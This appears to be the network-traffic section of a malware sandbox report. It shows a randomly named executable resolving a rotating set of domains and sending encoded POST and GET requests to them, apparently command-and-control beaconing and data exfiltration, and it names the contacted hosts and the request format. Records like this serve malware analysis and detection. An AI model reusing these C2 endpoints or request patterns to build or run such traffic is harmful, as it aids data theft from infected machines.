Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 16, 2024 09:29:21.796139002 CEST | 53 | 58774 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:29:35.534240961 CEST | 53 | 59934 | 162.159.36.2 | 192.168.2.4
Sep 16, 2024 09:29:36.266726017 CEST | 57509 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:29:36.273632050 CEST | 53 | 57509 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:29:57.424257994 CEST | 64718 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:29:57.438783884 CEST | 53 | 64718 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:30:12.985707045 CEST | 60566 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:30:13.119426966 CEST | 53 | 60566 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:30:26.277317047 CEST | 62933 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:30:26.291018963 CEST | 53 | 62933 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:30:46.891277075 CEST | 61819 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:30:46.921623945 CEST | 53 | 61819 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:31:03.045825958 CEST | 56032 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:31:03.145997047 CEST | 53 | 56032 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:31:16.309747934 CEST | 51067 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:31:16.927654028 CEST | 53 | 51067 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:31:50.966010094 CEST | 52668 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:31:51.175597906 CEST | 53 | 52668 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:32:04.449464083 CEST | 63580 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:32:04.897169113 CEST | 53 | 63580 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:32:18.184184074 CEST | 57962 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:32:18.218533993 CEST | 53 | 57962 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:32:32.043488026 CEST | 50671 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:32:32.052361965 CEST | 53 | 50671 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:32:40.122154951 CEST | 60965 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:32:40.140762091 CEST | 53 | 60965 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:32:53.293618917 CEST | 50979 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:32:53.528307915 CEST | 53 | 50979 | 1.1.1.1 | 192.168.2.4
Sep 16, 2024 09:33:07.011509895 CEST | 56874 | 53 | 192.168.2.4 | 1.1.1.1
Sep 16, 2024 09:33:07.085104942 CEST | 53 | 56874 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 16, 2024 09:29:36.266726017 CEST | 192.168.2.4 | 1.1.1.1 | 0x2935 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 16, 2024 09:29:57.424257994 CEST | 192.168.2.4 | 1.1.1.1 | 0xd16c | Standard query (0) | www.aaavvejibej.bond | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:12.985707045 CEST | 192.168.2.4 | 1.1.1.1 | 0x7957 | Standard query (0) | www.whats-in-the-box.org | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:26.277317047 CEST | 192.168.2.4 | 1.1.1.1 | 0x19fe | Standard query (0) | www.weatherbook.live | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:46.891277075 CEST | 192.168.2.4 | 1.1.1.1 | 0x1a2b | Standard query (0) | www.crowsecurity.cloud | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:03.045825958 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1fe | Standard query (0) | www.inspireplay.live | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:16.309747934 CEST | 192.168.2.4 | 1.1.1.1 | 0xba4a | Standard query (0) | www.shanhaiguan.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:50.966010094 CEST | 192.168.2.4 | 1.1.1.1 | 0xdd52 | Standard query (0) | www.lanxuanz.tech | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:04.449464083 CEST | 192.168.2.4 | 1.1.1.1 | 0xc46d | Standard query (0) | www.selftip.top | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:18.184184074 CEST | 192.168.2.4 | 1.1.1.1 | 0xbb54 | Standard query (0) | www.newdaydawning.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:32.043488026 CEST | 192.168.2.4 | 1.1.1.1 | 0x9e46 | Standard query (0) | www.kfowks.site | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:40.122154951 CEST | 192.168.2.4 | 1.1.1.1 | 0xdfba | Standard query (0) | www.o731lh.vip | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:53.293618917 CEST | 192.168.2.4 | 1.1.1.1 | 0x13fc | Standard query (0) | www.wajf.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:33:07.011509895 CEST | 192.168.2.4 | 1.1.1.1 | 0x22fa | Standard query (0) | www.turbonotes.app | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 16, 2024 09:29:36.273632050 CEST | 1.1.1.1 | 192.168.2.4 | 0x2935 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 16, 2024 09:29:57.438783884 CEST | 1.1.1.1 | 192.168.2.4 | 0xd16c | No error (0) | www.aaavvejibej.bond |  | 104.21.31.249 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:29:57.438783884 CEST | 1.1.1.1 | 192.168.2.4 | 0xd16c | No error (0) | www.aaavvejibej.bond |  | 172.67.181.150 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:13.119426966 CEST | 1.1.1.1 | 192.168.2.4 | 0x7957 | No error (0) | www.whats-in-the-box.org | whats-in-the-box.org |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:30:13.119426966 CEST | 1.1.1.1 | 192.168.2.4 | 0x7957 | No error (0) | whats-in-the-box.org |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:13.119426966 CEST | 1.1.1.1 | 192.168.2.4 | 0x7957 | No error (0) | whats-in-the-box.org |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:26.291018963 CEST | 1.1.1.1 | 192.168.2.4 | 0x19fe | No error (0) | www.weatherbook.live | weatherbook.live |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:30:26.291018963 CEST | 1.1.1.1 | 192.168.2.4 | 0x19fe | No error (0) | weatherbook.live |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:26.291018963 CEST | 1.1.1.1 | 192.168.2.4 | 0x19fe | No error (0) | weatherbook.live |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:46.921623945 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a2b | No error (0) | www.crowsecurity.cloud | crowsecurity.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:30:46.921623945 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a2b | No error (0) | crowsecurity.cloud |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:30:46.921623945 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a2b | No error (0) | crowsecurity.cloud |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:03.145997047 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1fe | No error (0) | www.inspireplay.live | inspireplay.live |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:31:03.145997047 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1fe | No error (0) | inspireplay.live |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:03.145997047 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1fe | No error (0) | inspireplay.live |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:16.927654028 CEST | 1.1.1.1 | 192.168.2.4 | 0xba4a | No error (0) | www.shanhaiguan.net |  | 156.242.132.82 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:31:51.175597906 CEST | 1.1.1.1 | 192.168.2.4 | 0xdd52 | No error (0) | www.lanxuanz.tech | zhs.zohosites.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:31:51.175597906 CEST | 1.1.1.1 | 192.168.2.4 | 0xdd52 | No error (0) | zhs.zohosites.com |  | 136.143.186.12 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:04.897169113 CEST | 1.1.1.1 | 192.168.2.4 | 0xc46d | No error (0) | www.selftip.top |  | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:18.218533993 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb54 | No error (0) | www.newdaydawning.net | newdaydawning.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:32:18.218533993 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb54 | No error (0) | newdaydawning.net |  | 44.213.25.70 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:32.052361965 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e46 | Name error (3) | www.kfowks.site | none | none | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:40.140762091 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfba | No error (0) | www.o731lh.vip | o731lh.vip |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:32:40.140762091 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfba | No error (0) | o731lh.vip |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:40.140762091 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfba | No error (0) | o731lh.vip |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:53.528307915 CEST | 1.1.1.1 | 192.168.2.4 | 0x13fc | No error (0) | www.wajf.net | comingsoon.namebright.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:32:53.528307915 CEST | 1.1.1.1 | 192.168.2.4 | 0x13fc | No error (0) | comingsoon.namebright.com | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:32:53.528307915 CEST | 1.1.1.1 | 192.168.2.4 | 0x13fc | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | 54.81.206.248 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:32:53.528307915 CEST | 1.1.1.1 | 192.168.2.4 | 0x13fc | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | 44.199.117.82 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:33:07.085104942 CEST | 1.1.1.1 | 192.168.2.4 | 0x22fa | No error (0) | www.turbonotes.app | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:33:07.085104942 CEST | 1.1.1.1 | 192.168.2.4 | 0x22fa | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
• www.aaavvejibej.bond
• www.whats-in-the-box.org
• www.weatherbook.live
• www.crowsecurity.cloud
• www.inspireplay.live
• www.shanhaiguan.net
• www.lanxuanz.tech
• www.selftip.top
• www.newdaydawning.net
• www.o731lh.vip
• www.wajf.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 55809 | 104.21.31.249 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:29:57.457849026 CEST | 514 | OUT | GET /lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH HTTP/1.1
Host: www.aaavvejibej.bond
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Sep 16, 2024 09:29:57.902678013 CEST | 774 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 16 Sep 2024 07:29:57 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWpR%2BI4f4f%2Brp%2ByE%2BGjg2jCJEDTCiHHL2xIp7cz4mT3EwEw7AY3CST4x6ar8vwQjXnWGGX9GWjVS9UsLLFbmoaeJmhFIudQhL8qC5p1OTkmbVOMYZcJhTsSbTE7JVLWZ3eaGO2fKKg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c3f2600880043be-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 31 30
Data Ascii: error code: 1010


                                   Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 55810 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:13.143157005 CEST | Bytes transferred: 795 | Direction: OUT | Data:
                                   POST /30jd/ HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.whats-in-the-box.org
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.whats-in-the-box.org/30jd/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=Dvr+OHpWQbs87hIyj33C7fZFRHU5wP9KVrMdChK9u5+iueU8N2EloHzVddWGEpiPNAhSP4O0UL95y4GvcyNee6odSLpUmvPHx0wvviY9uQIYcDoo1sbc29QePXo+XqH7yysJd2p6Med4h+95wk8pEFjSvWnfSLG5eOCNY/PviSL9dCj0faFWaOdxpFzMNTlgsg==


                                   Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 55811 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:15.719965935 CEST | Bytes transferred: 815 | Direction: OUT | Data:
                                   POST /30jd/ HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.whats-in-the-box.org
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.whats-in-the-box.org/30jd/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=Dvr+OHpWQbs86B4ys3LC9/ZCP3U56v9OVqwdCgOttKKigbo8O0slvHzVJNWDApjiNAktP5y0ULp5y6evfAlZEKofarpspPPHx0wvviMHuQAYcy4o1JvfqtQfOXo+BaH/yysrdyxcMbB4h8l5zxIqf1jYi2nPXK29HO7DXvPOrCPlYEyuOrkBIO5C0C64AQYp3n9sKG9BxonQgBXCndVoRWw=


                                   Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 55812 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:18.267452955 CEST | Bytes transferred: 10897 | Direction: OUT | Data:
                                   POST /30jd/ HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.whats-in-the-box.org
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.whats-in-the-box.org/30jd/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                   Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 55813 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:20.808948994 CEST | Bytes transferred: 518 | Direction: OUT | Data:
                                   GET /30jd/?h2Pt9=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                   Timestamp: Sep 16, 2024 09:30:21.255518913 CEST | Bytes transferred: 396 | Direction: IN | Data:
                                   HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:30:21 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&4RLhs=7BJLM4eH"}</script></head></html>


                                   Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 55814 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:26.320586920 CEST | Bytes transferred: 783 | Direction: OUT | Data:
                                   POST /4hiy/ HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.weatherbook.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.weatherbook.live/4hiy/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=85WWLJPBrXi6EpTX0zdTg5VP9kUu7Qw5Y9LmlvIdUvCo3UWVPwsNkaDTRp4nYXKrEuq8IAU1He+/pDWx3QCAArj/ED+j7LMFyYGQ/Y0A5JWsHn+HHOmqBbGtIIvcNUVSJv9r39ztv0qElCx2tn055aj8VZx2zGqVYJviBIeoYNaswIl+ANrBZ8ShnhEem3vokw==


                                   Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 55815 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:28.874934912 CEST | Bytes transferred: 803 | Direction: OUT | Data:
                                   POST /4hiy/ HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.weatherbook.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.weatherbook.live/4hiy/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=85WWLJPBrXi6FJDXzQ1TlZVMzEUuiAw9Y9Hmlr4NU8qo0xSVOxsNnaDTJZ4mHHLnEu3cIBo1HaW/pDmx0hCDG7j5OT+lkbMFyYGQ/Yg65JesHUWHEratCbGuBovcaEVWJv8M35zXvxuElAp2q1Q4gqj6LpwE93H7UrzzBrSKG/S7xO0kR8KWL82S6mNqr0Sh/8k3tEMGX0eytstmg2H1Sxg=


                                   Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 55816 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:31.416431904 CEST | Bytes transferred: 10885 | Direction: OUT | Data:
                                   POST /4hiy/ HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.weatherbook.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.weatherbook.live/4hiy/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                   Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 55817 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:34.348057985 CEST | Bytes transferred: 514 | Direction: OUT | Data:
                                   GET /4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                   Timestamp: Sep 16, 2024 09:30:41.867685080 CEST | Bytes transferred: 396 | Direction: IN | Data:
                                   HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:30:41 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH"}</script></head></html>


                                   Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 55818 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:46.950253010 CEST | Bytes transferred: 789 | Direction: OUT | Data:
                                   POST /jvjp/ HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.crowsecurity.cloud
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.crowsecurity.cloud/jvjp/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=1ZRspb5/iQw8SDiKTeYdRFmUET9CWM5mT6CRYIW+ngpXEh+aivdfsgwDGoZd3LTx/sa+jBQ6Pn8VnWxP9DxlFfdGNhMKvntRiE+5dxOipdfnjMYmjbenVipfsn3Puhz/TDn8lKWSxbOfSjD21K/QtkySU/uFbjF53je01efpqHrTP8YmyiQsTu6cKf4Frd1+lQ==


                                   Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 55819 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:49.507642031 CEST | Bytes transferred: 809 | Direction: OUT | Data:
                                   POST /jvjp/ HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.crowsecurity.cloud
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.crowsecurity.cloud/jvjp/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=1ZRspb5/iQw8TiyKV5EdG1mTKz9CYs5iT6ORYJSumWxXdECatLxfvgwDOIZY4rTv/se2jFY6PnoVnS1P+0tiDfdYYxMIrntRiE+5dxqIpdHni9ImyKekcCpcrn3Pqhz7TDnKlLK8xYmfShL21b/X2UycQ/vINj4hxCvmyIPY10KxO6J8jTx7BuevXYxxmeI3+QgOgjCzFjXYp2lAh9LHD3k=


